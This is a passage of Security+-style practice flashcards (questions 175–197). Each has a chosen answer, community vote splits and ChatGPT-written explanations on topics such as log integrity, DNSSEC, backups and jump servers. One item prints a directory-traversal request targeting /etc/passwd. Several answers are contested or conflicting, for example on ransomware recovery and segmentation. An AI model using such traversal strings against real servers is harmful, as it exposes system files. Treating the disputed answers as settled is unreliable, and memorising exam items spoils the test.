Intranet: An intranet is a private network within an organization, typically accessed via a VPN or similar secure connection, but it doesn't provide segmentation within a single network.

Screened subnet: This involves placing a firewall between two networks to control traffic, which may not be directly applicable to a cloud environment without additional complexity.

Zero Trust: Zero Trust is a security model that assumes all access attempts are potentially malicious and verifies each request as though it originates from an open network, but it's a broader strategy rather than a specific segmentation solution.

Therefore, VLAN segmentation is the most practical solution for segmenting production and non-production servers within a flat network in the cloud, allowing for isolation of traffic and enhanced security without the need for physical network restructuring.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
175
Q

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

a. Password complexity
b. Acceptable use
c. Access control
d. Clean desk

A

(Community D 70%, C 30%)
d. Clean desk

Here’s why:

Clean Desk Policy: This policy ensures that sensitive information, documents, and equipment are not left unattended or visible when not in use. It minimizes the risk of visitors or unauthorized individuals accessing or capturing confidential information during SOC tours. By keeping workspaces clear of unnecessary items, especially when tours are being conducted, the chances of accidental exposure or intentional data theft are significantly reduced.

Let’s briefly review the other options:

Password complexity: While important for securing access to systems, this policy does not directly address the physical security risks associated with tours of the SOC.

Acceptable use: This policy governs the appropriate use of organizational resources by employees. While crucial, it does not specifically mitigate the risks associated with physical tours of the SOC.

Access control: Access control policies are essential for managing who can enter and interact with various systems and areas. However, this option does not directly address the issue of securing physical spaces and preventing unauthorized access to sensitive information during tours.

Therefore, implementing a Clean Desk Policy is the most effective measure to mitigate the risk of malicious activity following SOC tours by ensuring that sensitive information is not exposed to visitors.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
176
Q

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:

-Critical fileshares will remain accessible during and after a natural disaster.
-Five percent of hard disks can fail at any given time without impacting the data.
-Systems will be forced to shut down gracefully when battery levels are below 20%.

Which of the following are required to BEST meet these objectives? (Choose three.)

a. Fiber switching
b. IaC
c. NAS
d. RAID
e. UPS
f. Redundant power supplies
g. Geographic dispersal
h. Snapshots
i. Load balancing

A

(Community DEG 79%)

d. RAID
e. UPS
g. Geographic dispersal

Here’s why:

RAID (Redundant Array of Independent Disks): This meets the requirement of allowing up to five percent of hard disks to fail without impacting the data. RAID configurations provide disk redundancy and fault tolerance.

UPS (Uninterruptible Power Supply): This ensures that systems will be forced to shut down gracefully when battery levels are below 20%. A UPS provides backup power and can manage safe shutdowns during power outages.

Geographic dispersal: This ensures that critical fileshares will remain accessible during and after a natural disaster. By distributing data centers geographically, the risk of a single natural disaster affecting all data centers is minimized, enhancing availability and disaster recovery capabilities.

The other options are beneficial for overall infrastructure but do not directly address the specific resiliency requirements outlined:

Fiber switching: Improves network performance and redundancy but does not directly relate to the specified requirements.
IaC (Infrastructure as Code): Enhances deployment and management efficiency but does not directly address the specific resiliency requirements.
NAS (Network Attached Storage): Provides centralized storage but does not inherently offer the resiliency required.
Redundant power supplies: Improve power redundancy but do not specifically ensure a graceful shutdown or data accessibility during a disaster.
Snapshots: Provide data backups but do not ensure continuous availability during a disaster.
Load balancing: Distributes workloads but does not directly address the specified resiliency requirements.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
177
Q

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

a. Set up hashing on the source log file servers that complies with local regulatory requirements.
b. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.
c. Write protect the aggregated log files and move them to an isolated server with limited access.
d. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A

(Community : A 52%, C 48%)
c. Write protect the aggregated log files and move them to an isolated server with limited access.

The question asks about integrity of the AGGREGATE logs. Answer choice A only mentions hashing the source logs. Either way, hashing does not provide integrity. Rather, hashing will detect whether or not the integrity of a particular piece of data is maintained, but hashing on it’s own will not ENSURE the integrity. You need a preventative control, which would be storing on a write-protected server.

Here’s a breakdown of why option C is the best choice for ensuring the integrity of aggregated log files within a Security Information and Event Management (SIEM) system:

Write Protection: This prevents any modifications to the log files after they are created. Once logs are written, protecting them from changes ensures that the data remains trustworthy and tamper-proof.
Isolated Server with Limited Access: By storing the logs on an isolated server, you reduce the risk of unauthorized access and potential tampering. Limited access control ensures that only designated personnel can interact with the logs, further securing the integrity of the data.

c. Write protect the aggregated log files and move them to an isolated server with limited access.
Explanation:

Ensuring the integrity of aggregated log files within a SIEM (Security Information and Event Management) system is crucial for accurate incident detection, investigation, and compliance. Here’s why option (c) is the best practice:

Write protection: Prevents unauthorized modifications to the log files, ensuring that once logs are aggregated and written, they cannot be altered. This is critical for maintaining their integrity.

Isolated server with limited access: By moving the log files to an isolated server, the risk of tampering or unauthorized access is significantly reduced. Limited access ensures that only authorized personnel can interact with the log files, further protecting their integrity.

Here’s why other options are less suitable:

Set up hashing on the source log file servers: While hashing can help verify integrity, it does not prevent tampering. If an attacker can modify the log files, they might also be able to update the hashes.

Back up the aggregated log files: While backups are important for recovery, they do not ensure integrity on their own. If the log files are tampered with before backup, the backups will contain the tampered data.

Back up the source log files: This practice is related to data retention and recovery, not specifically to ensuring the integrity of aggregated logs within a SIEM.

Therefore, write protecting the aggregated log files and moving them to an isolated server with limited access is the most effective practice for maintaining the integrity of log files within a SIEM system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
178
Q

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company’s cloud environment. Which of the following is an immediate consequence of these integrations?

a. Non-compliance with data sovereignty rules
b. Loss of the vendors interoperability support
c. Mandatory deployment of a SIEM solution
d. Increase in the attack surface

A

d. Increase in the attack surface

Explanation:

Increase in the attack surface: Integrating multiple security solutions typically involves installing additional agents, connectors, or APIs to gather data from various cloud services and resources. Each integration introduces potential vulnerabilities that attackers could exploit. These vulnerabilities may arise from misconfigurations, insecure APIs, or weaknesses in the security solutions themselves. Therefore, the more integrations and agents are deployed, the broader the attack surface becomes, increasing the potential avenues for attackers to target and compromise the organization's cloud environment.

Let’s briefly discuss why the other options are not immediate consequences in this context:

Option a: Non-compliance with data sovereignty rules could occur if data is processed or stored in a manner that violates regulatory requirements, but this is not necessarily an immediate consequence of integrating security solutions.

Option b: Loss of vendor interoperability support could be a risk in the long term if vendors do not support the integration or if compatibility issues arise, but it is not an immediate consequence of integration.

Option c: Mandatory deployment of a SIEM solution may be a strategic decision to centralize and analyze security logs, but it is not an immediate consequence of integrating multiple security solutions.

Therefore, option d, an increase in the attack surface, is the most relevant and immediate consequence to consider when authorizing multiple security solutions to collect data from a company’s cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
179
Q

Which of the following explains why RTO is included in a BIA?

a. It identifies the amount of allowable downtime for an application or system.
b. It prioritizes risks so the organization can allocate resources appropriately.
c. It monetizes the loss of an asset and determines a break-even point for risk mitigation.
d. It informs the backup approach so that the organization can recover data to a known time.

A

a. It identifies the amount of allowable downtime for an application or system.

Explanation:

RTO (Recovery Time Objective) is a critical metric defined in a Business Impact Analysis (BIA) to determine the maximum acceptable downtime for a business process, application, or system. It helps in setting expectations regarding how quickly a system or process needs to be restored after a disruption or disaster.

Business Impact Analysis (BIA) is a process used to evaluate the potential effects of an interruption to critical business operations. It helps organizations prioritize their recovery efforts and allocate resources effectively based on the impact of various scenarios.

Option a correctly explains that RTO is included in a BIA because it specifies the allowable downtime, which is crucial for prioritizing recovery efforts and ensuring that the organization can resume operations within acceptable limits after a disruption.

Let’s briefly review why the other options are incorrect:

Option b: Prioritizing risks and allocating resources appropriately is more closely related to Risk Assessment and Management, not specifically to why RTO is included in a BIA.

Option c: Monetizing the loss of an asset and determining a break-even point is more aligned with Cost-Benefit Analysis and Financial Risk Assessment, not directly with the purpose of RTO in a BIA.

Option d: Informing the backup approach to recover data to a known time is related to Backup and Recovery Planning, but it does not specifically address why RTO is included in a BIA.

Therefore, the correct and most relevant explanation for why RTO is included in a BIA is to identify the allowable downtime for an application or system (option a).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
180
Q

A security analyst is reviewing web-application logs and finds the following log:

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd

Which of the following attacks is being observed?

a. Directory traversal
b. XSS
c. CSRF
d. On-path attack

A

a. Directory traversal

Explanation:

Directory traversal (also known as path traversal) is a web security vulnerability that allows an attacker to access files and directories that are stored outside the web root folder. In the provided log entry:

perl

https://www.comptia.org/contact-us/%3Ffile%3D..%2F..%2F..%Fetc%2Fpasswd

%3F represents the URL encoding for ?.
%2F represents the URL encoding for /.
%F and %2F concatenated (%Fetc%2F) are part of the encoded attempt to traverse directories (../) to access the /etc/passwd file.

The presence of ..%2F..%2F..%Fetc%2Fpasswd in the URL indicates an attempt to go up multiple directory levels (..) from the current directory context, ultimately trying to access sensitive system files like /etc/passwd.

XSS (Cross-Site Scripting) involves injecting malicious scripts into web pages viewed by other users.

CSRF (Cross-Site Request Forgery) involves tricking a user into unknowingly executing actions on a web application.

On-path attack typically involves intercepting or manipulating traffic between a user and a web application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
181
Q

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

a. Security patches were uninstalled due to user impact.
b. An adversary altered the vulnerability scan reports
c. A zero-day vulnerability was used to exploit the web server
d. The scan reported a false negative for the vulnerability

A

a. Security patches were uninstalled due to user impact.

Here’s why this is the most likely cause:

Uninstalled Security Patches: It is common for organizations to uninstall or roll back security patches if they cause unexpected issues or user impact, such as application failures or performance degradation. This action could leave the system vulnerable to known exploits, even though patches were previously available and possibly installed at one point.

Historical Scan Reports: The presence of the vulnerability in historical vulnerability scan reports suggests that at some point, the vulnerability was detected and possibly patched. If patches were later uninstalled, either intentionally or unintentionally, the vulnerability would reappear and potentially be exploitable.

User Impact Concerns: Security patches sometimes introduce compatibility issues or unexpected behavior in applications. In response to these issues, administrators may decide to uninstall or delay applying patches until they can be tested further or until an alternative solution is found. This decision, however, leaves the system exposed to known vulnerabilities.

The other options are less likely based on the information given:

b. Adversary altering scan reports: This is less likely unless there is evidence of compromise affecting the integrity of scan reports, which is not provided in the scenario.

c. Zero-day vulnerability: If it were a zero-day vulnerability, it would not be present in historical scan reports, as these vulnerabilities are unknown to the public and security vendors until they are exploited.

d. False negative in scan reports: While possible, historical reports showing the vulnerability before the incident suggests the vulnerability was previously detected, making it less likely to be a false negative.

Therefore, considering the scenario and the details provided, a. Security patches were uninstalled due to user impact is the most plausible cause for the vulnerability being present and exploitable on the web server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
182
Q

Which of the following is a known security risk associated with data archives that contain financial information?

a. Data can become a liability if archived longer than required by regulatory guidance.
b. Data must be archived off-site to avoid breaches and meet business requirements.
c. Companies are prohibited from providing archived data to e-discovery requests.
d. Unencrypted archives should be preserved as long as possible and encrypted.

A

a. Data can become a liability if archived longer than required by regulatory guidance.

Explanation:

Data archives that contain financial information pose several security risks, and among them, the most significant is the risk associated with regulatory compliance and retention requirements. Here’s why each option is correct or incorrect:

Option a: Data can become a liability if archived longer than required by regulatory guidance.
    This is a known security risk because regulatory frameworks often dictate specific retention periods for financial data. Keeping data longer than necessary can lead to legal and compliance issues, as well as increased exposure to data breaches and misuse.

Option b: Data must be archived off-site to avoid breaches and meet business requirements.
    While off-site storage is a common practice for disaster recovery and business continuity, it primarily addresses availability concerns rather than security risks associated with retention periods or compliance.

Option c: Companies are prohibited from providing archived data to e-discovery requests.
    This statement is incorrect because archived data is often subject to e-discovery requests as part of legal proceedings. However, the manner in which data is archived and the compliance with legal hold requirements are critical factors in responding to such requests.

Option d: Unencrypted archives should be preserved as long as possible and encrypted.
    This statement is incorrect because unencrypted archives pose significant security risks, especially for financial information. Archives should be encrypted to protect sensitive data from unauthorized access and breaches.

Therefore, option a is the best answer as it directly addresses the security risk associated with regulatory compliance and the potential liability of retaining financial data longer than necessary.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
183
Q

Which of the following BEST describes the process of documenting who has access to evidence?

a. Order of volatility
b. Chain of custody
c. Non-repudiation
d. Admissibility

A

b. Chain of custody

Explanation:

Chain of custody refers to the documentation and procedures used to establish the history of an item of evidence. It tracks the movement and handling of evidence from the moment it is collected until it is presented in court or used in an investigation. This process ensures that the integrity of the evidence is maintained and can be verified, including who has accessed it and when.

Let’s briefly explain why the other options are not correct:

Order of volatility (a): This refers to the principle of preserving evidence in a sequence that captures volatile data first, such as RAM, which is more transient compared to persistent storage. It does not directly address documenting who has access to evidence.

Non-repudiation (c): This refers to the ability to prove that a specific party took a particular action and cannot deny having done so. It applies more to actions such as digital signatures and transactions, rather than to the documentation of physical or digital evidence access.

Admissibility (d): This refers to whether evidence is considered acceptable and valid in a court of law based on legal standards. It involves ensuring that evidence collection and handling procedures, including chain of custody, have been followed correctly, but it doesn't specifically address documenting who has access to evidence.

Therefore, chain of custody (b) is the process that specifically involves documenting and maintaining records of who has access to evidence throughout its handling and storage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
184
Q

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

a. Private cloud
b. SaaS
c. Hybrid cloud
d. IaaS
e. DRaaS
f. Fog computing

A

(Community CF 66%, AF 28%)
c. Hybrid cloud
f. Fog computing

“Many people use the terms fog computing and edge computing interchangeably because both involve bringing intelligence and processing closer to where the data is created” - https://www.techtarget.com/iotagenda/definition/fog-computing-fogging

While a private cloud can provide security and control, it may not be as suitable for “low-latency” requirements in scenarios involving network-connected devices.

Hybrid cloud environments can also incorporate edge computing, which processes data closer to the source (devices) to reduce latency and improve performance.

(ChatGPT & Braindump)
c. Hybrid cloud
f. Fog computing
Explanation:

Hybrid cloud (c): A hybrid cloud architecture allows for the integration of private and public cloud services, providing flexibility to perform analytics closer to the endpoints (on-premises or in private cloud) while leveraging the scalability and resources of public cloud services for other tasks.

Fog computing (f): Fog computing extends cloud computing to the edge of the network, closer to devices and endpoints. It enables data processing and analytics to be performed locally on edge devices or in nearby servers, reducing latency and conserving bandwidth by minimizing the need to transmit raw data to distant cloud data centers.

Why the other options are not the best choices:

Private cloud (a): A private cloud typically does not address the need for low latency and bandwidth reduction directly between network-connected devices or endpoints. It focuses more on providing dedicated resources within a controlled environment.

SaaS (b): Software as a Service (SaaS) delivers software applications over the internet, but it does not inherently address the low latency and analytics requirements at the network level or endpoint level.

IaaS (d): Infrastructure as a Service (IaaS) provides virtualized computing resources over the internet, such as virtual machines and storage, but it does not specifically address the low latency and analytics requirements at the endpoint level.

DRaaS (e): Disaster Recovery as a Service (DRaaS) focuses on providing backup and recovery solutions, which is different from the requirements of low latency and endpoint analytics.

Therefore, hybrid cloud (c) and fog computing (f) are the most suitable options for meeting the specified requirements.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
185
Q

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

a. Asset management policy
b. Separation of duties policy
c. Acceptable use policy
d. Job rotation policy

A

d. Job rotation policy

Here’s why:

Job Rotation Policy: This policy involves periodically moving employees between different jobs or roles within the organization. It helps employees gain a broader understanding of various functions, processes, and responsibilities across the organization. This not only enhances individual skill sets but also fosters a more versatile and knowledgeable workforce, which can improve overall organizational resilience and capability.

The other options, while important, do not specifically aim to increase the depth and breadth of knowledge across the organization:

Asset management policy: Focuses on the management of the organization's assets, ensuring they are properly tracked, maintained, and utilized. It does not directly contribute to increasing employee knowledge across different areas.

Separation of duties policy: Aims to reduce the risk of fraud and errors by ensuring that no single individual has control over all aspects of any critical process. While it enhances security and accountability, it does not necessarily promote broader knowledge among employees.

Acceptable use policy: Outlines the proper use of organizational resources and systems by employees. It helps ensure security and appropriate behavior but does not directly contribute to increasing knowledge across different areas of the organization.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
186
Q

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

a. WAF
b. CASB
c. VPN
d. TLS

A

b. CASB (Cloud Access Security Broker)

Here’s why CASB is the most suitable choice:

Tokenization Capability: CASB solutions can integrate with cloud environments to provide tokenization services. Tokenization replaces sensitive data (such as credit card numbers) with unique identification symbols (tokens) that retain essential information without exposing the actual data.

Control Over Data Access: CASBs offer granular control over data access and visibility in cloud environments. This includes policies that can restrict or monitor access to sensitive data, ensuring that the cloud provider does not have visibility into the original credit card information.

Compliance and Security: CASBs are designed to enforce security policies across cloud services, ensuring compliance with regulatory requirements (such as PCI DSS for handling credit card information). This helps in maintaining data privacy and security while using cloud services.

In contrast, the other options:

WAF (Web Application Firewall): While important for web application security, WAF primarily focuses on filtering and monitoring HTTP traffic to and from a web application. It does not directly address the tokenization or data visibility requirements mentioned.

VPN (Virtual Private Network): VPNs are used to create secure, encrypted connections over a less secure network (like the internet). While they provide secure communication channels, they do not inherently tokenize data or control data visibility within a cloud environment.

TLS (Transport Layer Security): TLS provides encryption for data in transit between clients and servers. While essential for securing data in transit, it does not address tokenization or control data visibility within cloud storage.

Therefore, CASB is the best option as it directly addresses the requirement to tokenize credit card data while ensuring the cloud provider does not have visibility into the sensitive information stored in the cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
187
Q

A security analyst is tasked with defining the “something you are” factor of the company’s MFA settings. Which of the following is BEST to use to complete the configuration?

a. Gait analysis
b. Vein
c. Soft token
d. HMAC-based, one-time password

A

b. Vein

Here’s why vein is the best choice:

Biometric Authentication: Vein recognition is a form of biometric authentication that identifies individuals based on the patterns of veins in their hands or fingers. It is a highly secure method because vein patterns are unique to each individual and difficult to replicate or steal compared to other biometric features like fingerprints.

Accuracy and Reliability: Vein recognition technology is known for its high accuracy and reliability. It is less susceptible to spoofing or false positives compared to other biometric methods like facial recognition or voice recognition.

Non-intrusive: Unlike gait analysis, which requires observing and analyzing how a person walks, vein recognition can be done discreetly using near-infrared light to capture vein patterns beneath the skin's surface. This makes it a more practical and user-friendly choice for MFA implementations.

Compliance and Security: Vein recognition meets stringent security requirements for MFA, especially in environments where high levels of security are necessary, such as accessing sensitive systems or data.

In contrast:

Gait analysis involves analyzing the way a person walks to identify them, which is more complex to implement and may not be as widely supported or accurate as vein recognition.

Soft token and HMAC-based one-time password (OTP) are typically used as the "something you have" factor in MFA, where soft tokens generate OTPs and HMAC-based OTPs are cryptographic tokens generated by hardware or software.

Therefore, based on the requirement to define the “something you are” factor for MFA, b. Vein recognition offers a robust and secure biometric authentication method suitable for this purpose.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
188
Q

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

a. Pulverizing
b. Overwriting
c. Shredding
d. Degaussing

A

b. Overwriting

Overwriting is a process where data on a storage device (such as a hard drive or solid-state drive) is replaced with new data multiple times, effectively erasing the original data. This method allows the storage device to be reused afterward because the existing data is no longer recoverable. Overwriting typically involves writing random patterns of data over the entire storage area multiple times to ensure that the previous data cannot be reconstructed.

Here’s a brief explanation of the other options:

Pulverizing: This involves physically destroying the storage device into small pieces or powder, rendering it unusable and ensuring that data cannot be recovered.

Shredding: Similar to pulverizing, shredding involves physically destroying the storage device, usually into small pieces or strips, to prevent data recovery.

Degaussing: This method uses a strong magnetic field to disrupt the magnetic domains on magnetic storage devices (such as hard drives or tapes), effectively erasing the data. However, it typically renders the storage device unusable for future data storage.

Therefore, while all methods can effectively eliminate data, overwriting specifically allows the storage device to be reused after the process, making it the correct choice for scenarios where the device needs to be repurposed or reused securely.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
189
Q

A user’s account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Time Log Message
9:00:00 AM login: user password: aBG23TMV
9:00:01 AM login: user password: aBG33TMV
9:00:02 AM login: user password: aBG43TMV
9:00:03 AM login: user password: aBG53TMV

Which of the following describes what is occurring?

a. An attacker is utilizing a password-spraying attack against the account.
b. An attacker is utilizing a dictionary attack against the account.
c. An attacker is utilizing a brute-force attack against the account.
d. An attacker is utilizing a rainbow table attack against the account.

A

c. An attacker is utilizing a brute-force attack against the account.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
190
Q

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

a. The last incremental backup that was conducted 72 hours ago
b. The last known-good configuration
c. The last full backup that was conducted seven days ago
d. The baseline OS configuration

A

b. The last known-good configuration

(Community C 57%, B 22%, A 20%)
(Braindump : a. The last incremental backup that was conducted 72 hours ago)

ChatGPT
b. The last known-good configuration

Explanation :
a. The last incremental backup that was conducted 72 hours ago:

This backup might contain some data up to 72 hours ago, but it could potentially include encrypted files if the ransomware had already infiltrated the server at that time. It may not fully address the current compromised state.

b. The last known-good configuration:

This option involves restoring from a configuration backup that was known to be secure before the ransomware attack occurred. It can help in restoring the server to a state where the ransomware was not present.

c. The last full backup that was conducted seven days ago:

This backup is likely older and would result in data loss of up to seven days. It may not be ideal if frequent updates or transactions have occurred since the last backup.

d. The baseline OS configuration:

This involves restoring the server to its initial state or a standard configuration known to be secure. It ensures that all system settings are reverted to a secure state, potentially removing any residual effects of the ransomware.

Best Choice:

b. The last known-good configuration

Restoring from the last known-good configuration ensures that the server is reverted to a state before the ransomware infection. It provides a higher likelihood of removing the ransomware and restoring the server to a secure and operational state without the risk of reinfection from compromised backups or data.

Therefore, option b is the most appropriate choice to restore services to a secure state promptly after a ransomware attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
191
Q

A network engineer created two subnets that will be used for production and development servers. Per security policy production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

a. VLANs
b. Internet proxy servers
c. NIDS
d. Jump servers

A

d. Jump servers

Here’s why this solution is appropriate:

Access Control: A bastion host is a dedicated server that acts as a gateway to access other servers in separate security zones (in this case, production and development). It allows administrators to securely connect to servers in each subnet without allowing direct communication between the subnets.

Security Isolation: By using a bastion host, you enforce access controls and isolate the production and development environments. Administrators must authenticate themselves to the bastion host, which then manages access to servers in each subnet based on defined security policies.

Auditability: All administrative access can be logged and audited from the bastion host, providing a clear record of who accessed which servers and when, enhancing security and compliance.

Simplicity and Management: Managing access through a single entry point (bastion host) simplifies network security management compared to allowing direct connectivity between subnets, which can be more complex to secure and monitor.

Therefore, deploying a bastion host or jump server is the recommended approach to enable server administrators to access devices in both the production and development subnets while maintaining the required network isolation and security.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
192
Q

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards.
With which of the following is the company’s data protection officer MOST likely concerned?

a. NIST Framework
b. ISO 27001
c. GDPR
d. PCI-DSS

A

c. GDPR (General Data Protection Regulation).

Here’s why:

GDPR: This regulation is focused on protecting the personal data and privacy of individuals within the European Union (EU) and the European Economic Area (EEA). It applies to organizations outside the EU/EEA that offer goods or services to, or monitor the behavior of, EU/EEA data subjects. Since the company is expanding globally, including into regions covered by GDPR, compliance with its stringent requirements regarding data privacy and security is crucial.

NIST Framework: While the NIST Cybersecurity Framework is widely recognized and used for cybersecurity risk management in the United States, its adoption is not mandatory by law or regulation in international markets. It is more of a guideline and framework rather than a legal compliance requirement.

ISO 27001: This standard provides requirements for establishing, implementing, maintaining, and continually improving an information security management system (ISMS). While ISO 27001 is widely respected globally, it focuses on information security management rather than specific data privacy requirements.

PCI-DSS: The Payment Card Industry Data Security Standard (PCI-DSS) is applicable primarily to organizations that handle credit card transactions. While important for payment security, it does not comprehensively cover data protection concerns related to global expansion and compliance with international data privacy regulations like GDPR.

Therefore, given the global expansion and the need to comply with stringent data protection laws affecting international markets, the company’s data protection officer would be most concerned with ensuring compliance with GDPR.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
193
Q

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?

a. Fog computing and KVMs
b. VDI and thin clients
c. Private cloud and DLP
d. Full drive encryption and thick clients

A

b. VDI (Virtual Desktop Infrastructure) and thin clients.

Here’s why this option is suitable:

VDI: Virtual Desktop Infrastructure allows users to access virtualized desktops hosted on servers in the data center. This means that the sensitive data remains centralized in the data center and is never stored or cached on the local workstations (thin clients) in the conference rooms. Users interact with their virtual desktop sessions over the network, and all data processing and storage occur centrally.

Thin clients: These are endpoint devices (workstations in the conference rooms) that are lightweight and designed to rely on the server-hosted virtual desktops. They have minimal storage and processing capabilities of their own, ensuring that no sensitive data is stored locally.

This solution ensures that:

Sensitive data remains under centralized control in the data center, reducing the risk of data exposure in the conference rooms.
Users can securely access and display sensitive data without the need for local storage or processing.
It aligns with the requirement of not storing sensitive data in the conference rooms, as all data handling is done within the secure environment of the data center.

Therefore, VDI and thin clients provide a secure and efficient solution for displaying sensitive data in conference rooms while maintaining compliance with data protection requirements.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
194
Q

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented?

a. DNSSEC
b. LDAPS
c. NGFW
d. DLP

A

a. DNSSEC (Domain Name System Security Extensions).

Explanation:

DNSSEC: DNSSEC is designed to protect the integrity and authenticity of DNS data. It uses cryptographic signatures to ensure that DNS responses (including zone transfers) have not been tampered with. By signing DNS data, DNSSEC provides a way to verify that the information received from a DNS server is authentic and has not been altered in transit.

Implementing DNSSEC ensures that:

DNS responses, including zone transfers, are authenticated and their integrity is validated.
It mitigates the risk of DNS spoofing or cache poisoning attacks.
It provides an additional layer of security for DNS infrastructure by ensuring that any changes or transfers of DNS zone data are verified and trusted.

Therefore, DNSSEC is the solution that should be implemented to validate and check the integrity of zone transfers.

LDAPS (Lightweight Directory Access Protocol Secure):

Purpose: LDAPS is used for securing directory services, such as those provided by Active Directory. It encrypts LDAP traffic to ensure confidentiality and integrity during communication.
Why Not Suitable: LDAPS does not deal with DNS or DNS zone transfers. Its primary use is for directory services, not DNS.

NGFW (Next-Generation Firewall):

Purpose: NGFWs provide advanced filtering capabilities, including application awareness, intrusion prevention, and deep packet inspection.
Why Not Suitable: While NGFWs enhance network security, they do not specifically address the integrity and authentication of DNS zone transfers. They are more about protecting the network perimeter and internal network traffic.

DLP (Data Loss Prevention):

Purpose: DLP solutions are designed to prevent the unauthorized transfer of sensitive data outside the organization. They monitor, detect, and block potential data breaches.
Why Not Suitable: DLP focuses on preventing data leaks and protecting sensitive information, not on DNS operations or ensuring the integrity of DNS zone transfers.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
195
Q

Which of the following controls is used to make an organization initially aware of a data compromise?

a. Protective
b. Preventative
c. Corrective
d. Detective

A

d. Detective

Explanation:

Detective Controls: These controls are designed to identify and alert on incidents or breaches as they occur. They monitor systems, networks, and activities to detect suspicious or malicious behavior. Examples include intrusion detection systems (IDS), security information and event management (SIEM) systems, and log monitoring.

Why not the others?:

Protective Controls: This is not a standard term in security controls. It seems to overlap with preventative or detective controls.
Preventative Controls: These controls are designed to prevent security incidents from occurring in the first place. Examples include firewalls, anti-virus software, and access control mechanisms. They aim to block or mitigate potential threats before they can cause harm.
Corrective Controls: These controls are implemented to correct or mitigate the effects of an incident after it has occurred. Examples include patch management, data recovery processes, and incident response plans.

Detective controls are specifically focused on discovering and alerting about ongoing or past security incidents, making them the correct choice for being initially aware of a data compromise.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
196
Q

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

a. CIS benchmarks
b. GDPR guidance
c. Regional regulations
d. ISO 27001 standards

A

a. CIS benchmarks

Explanation:

CIS (Center for Internet Security) benchmarks: These are globally recognized security standards and best practices for securing IT systems and data. They provide detailed configuration guidelines for various operating systems, applications, and network devices. Using CIS benchmarks ensures that OS-level configurations are updated to the latest and most secure settings.

Why not the others?:

GDPR guidance: The General Data Protection Regulation (GDPR) is primarily focused on data protection and privacy for individuals within the European Union. It does not provide specific guidelines for OS-level configurations or security hardening.
Regional regulations: These may include various legal requirements depending on the region, but they are typically not specific or detailed enough to guide the hardening of OS configurations. They often focus on broader compliance issues rather than specific technical configurations.
ISO 27001 standards: ISO 27001 is a standard for information security management systems (ISMS). While it provides a framework for managing information security, it does not offer specific, detailed configuration guidelines for operating systems.

CIS benchmarks are specifically designed to provide detailed and actionable guidance on securing OS-level configurations, making them the most appropriate choice for addressing the findings of an information security assessment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
197
Q

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

a. High availability
b. Application security
c. Segmentation
d. Integration and auditing

A

(Community : D 45%, C 43%)
(Braindump : D )
d. Integration and auditing

The company is transitioning network services to the cloud (they also just acquired several other small companies). The company’s primary focus in this scenario is to ensure performance and security REMAIN intact.

The key word: “remain intact” meaning they already have strong performance and security but they want this to continue while transitioning these additional companies and their network services to the cloud.

ChatGPT
c. Segmentation

Explanation:

Segmentation: This involves dividing a network into multiple smaller segments or subnets, each with its own set of security policies and controls. Segmentation can help improve both performance and security by isolating different parts of the network, reducing the attack surface, and limiting the spread of potential security breaches. By isolating critical services and workloads, segmentation ensures that performance issues in one segment do not affect others, and it also helps in containing and managing security incidents more effectively.

Why not the others?:

High availability: While high availability ensures that systems remain operational with minimal downtime, it primarily addresses performance and reliability, not security.
Application security: This focuses on securing applications from threats and vulnerabilities. While important, it does not address the broader network-level security and performance concerns that segmentation does.
